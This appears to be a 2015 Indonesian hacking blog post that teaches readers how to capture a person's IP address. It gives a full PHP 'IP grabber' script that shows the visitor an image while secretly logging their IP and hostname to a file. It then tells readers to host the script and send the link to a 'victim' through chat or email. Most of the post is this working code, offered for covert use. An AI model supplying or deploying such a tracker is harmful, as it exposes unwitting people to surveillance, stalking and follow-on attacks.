Bagaimana Cara Mengambil IP Addreess Seseorang ?
Labels: HACKING, IP ADDRESS
Dalam tutorial ini saya akan menunjukkan Anda bagaimana untuk mengambil seseorang alamat Ip menggunakan metode PHP script.This dapat digunakan untuk mengambil seseorang alamat Ip di yahoo atau facebookchat atau dengan mengirim email ke korban. Jadi Mari kita mulai.
Bagaimana meng-Hack IP Address Seseorang ?
1. Copy code di bawah ini dalam notepad dan save as Grab.php (.php harus/wajib)<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";
Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);
header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>
3. Sekarang Upload Grab.php ke situs web hosting Anda.
4. Salin link file yang Anda upload dan kirimkan ke korban.
5. Begitu korban akan mengklik link anda ip nya akan disimpan di situs hosting web gratis.
6. Enjoy you are Done !!
Bagaimana Cara Mengambil IP Addreess Seseorang ?
Reviewed by Khalifah
on
April 15, 2015
Rating:
No comments:
Post a Comment